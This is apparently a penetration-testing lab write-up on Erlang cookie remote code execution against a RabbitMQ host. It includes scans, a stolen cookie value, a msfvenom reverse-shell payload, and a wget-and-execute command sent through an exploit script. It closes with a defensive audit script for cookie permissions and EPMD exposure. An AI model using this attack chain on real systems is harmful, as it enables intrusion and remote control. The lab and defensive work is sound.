# 5: 4369 epmd

Using <https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd>

```
$ nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $ip
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 20:03 PDT
Nmap scan report for 192.168.197.68
Host is up (0.074s latency).

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|_    rabbit: 65000

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds

# so this tells us there's a rabbitmq node running on 65000, which nmap was unable to identify

https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
# erlang cookie RCE

Using ftp, we can read it
# path: /var/lib/rabbitmq/

ftp> ls -la
227 Entering Passive Mode (192,168,197,68,156,64).
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 May 08  2020 .
drwxr-xr-x   25 ftp      ftp          4096 Apr 24  2020 ..
-r--------    1 ftp      ftp            20 Apr 24  2020 .erlang.cookie
drwxr-x---    6 ftp      ftp          4096 Mar 10 20:43 mnesia
226 Directory send OK.

$ cat .erlang.cookie
JPCGJCAEWHPKKPBXBYYB

# more docs on how to RCE using erl and .erlang.cookie
https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/

# a . at the end of every expression makes the shell evaluate it

# -sname shortname (no domain needed)
# preferred: -name user@domain
$ erl -cookie JPCGJCAEWHPKKPBXBYYB -name kashz@kali
Erlang/OTP 24 [erts-12.0.3] [source] [64-bit] [smp:8:8] [ds:8:8:10] [async-threads:1] [jit]

Eshell V12.0.3  (abort with ^G)
(kashz@kali)1> net_adm:names('192.168.197.68').
{ok,[{"rabbit",65000}]}

# success, rabbit node running on port 65000

# now ping the node to confirm the cookie is valid
# pong = success | pang = failure
(kashz@kali)2> net_adm:ping('clyde@192.168.197.68').
pang

# exploit/multi/misc/erlang_cookie_rce
not working

# checking for automated exploit-db script

Using https://www.exploit-db.com/exploits/49418

# generate shell
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.197 LPORT=4369 -f elf -o kashz

# update these variables in 49418.py
TARGET = "192.168.197.68"
PORT = 65000
COOKIE = "JPCGJCAEWHPKKPBXBYYB"
CMD = "wget 192.168.49.197/kashz -O /tmp/kashz && chmod 777 /tmp/kashz && /tmp/kashz"

$ python3 49418.py
Extracted challenge: 1605844421
Authentication successful
Sending cmd: 'wget 192.168.49.197/kashz -O /tmp/kashz && chmod 777 /tmp/kashz && /tmp/kashz'
b'\x00\x00\x00\x00'

$ nc -lvnp 4369
listening on [any] 4369 ...
connect to [192.168.49.197] from (UNKNOWN) [192.168.197.68] 35926
rabbitmq@clyde:/var/lib/rabbitmq$ whoami;id;hostname;uname -a
rabbitmq
uid=107(rabbitmq) gid=112(rabbitmq) groups=112(rabbitmq)
clyde
Linux clyde 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64 GNU/Linux
```
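The two things the box handed over are a cookie file another service could read and an EPMD listener reachable from the network. The following audit script is an added example written for this writeup, not part of the original notes or of any exploit; the cookie path, the `ss -ltn` sample lines and the `ERL_EPMD_ADDRESS` hint are assumptions about a typical RabbitMQ host, and the demo cookie value is constructed.

```python
#!/usr/bin/env python3
"""Audit the two conditions the cookie RCE above depended on: a .erlang.cookie
readable by something other than the service, and EPMD (4369) reachable from
the network. Added example; paths and the ss sample are assumptions."""
import os
import stat
import tempfile


def audit_cookie_file(path, service_uid=None):
    """Return a list of findings for one cookie file; [] means it looks fine."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"{path}: mode {mode:04o} lets group/other read it (expect 0400)")
    if service_uid is not None and st.st_uid != service_uid:
        findings.append(f"{path}: owner uid {st.st_uid}, expected {service_uid}")
    with open(path) as fh:
        cookie = fh.read().strip()
    # Erlang generates 20 uppercase letters; a short or hand-picked cookie is
    # far easier to brute-force against the distribution port.
    if len(cookie) < 20 or not cookie.isupper():
        findings.append(f"{path}: cookie looks weak ({len(cookie)} chars)")
    return findings

def epmd_network_listeners(ss_lines):
    """From `ss -ltn` lines, return local sockets where 4369 is bound to a
    non-loopback address (ERL_EPMD_ADDRESS=127.0.0.1 would restrict it)."""
    exposed = []
    for line in ss_lines:
        fields = line.split()
        if len(fields) < 4 or not fields[3].endswith(":4369"):
            continue
        host = fields[3].rsplit(":", 1)[0]
        if host not in ("127.0.0.1", "[::1]"):
            exposed.append(fields[3])
    return exposed

def make_demo_cookie(mode):
    """Write a constructed cookie (not a real one) to a temp file with `mode`."""
    path = os.path.join(tempfile.mkdtemp(), ".erlang.cookie")
    with open(path, "w") as fh:
        fh.write("ABCDEFGHIJKLMNOPQRST\n")
    os.chmod(path, mode)
    return path
```

Run `audit_cookie_file("/var/lib/rabbitmq/.erlang.cookie", service_uid)` with the rabbitmq uid on a real host; the FTP read above would have been caught by the owner and mode checks only if the FTP daemon ran as a different account, so also review which services can read that directory.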
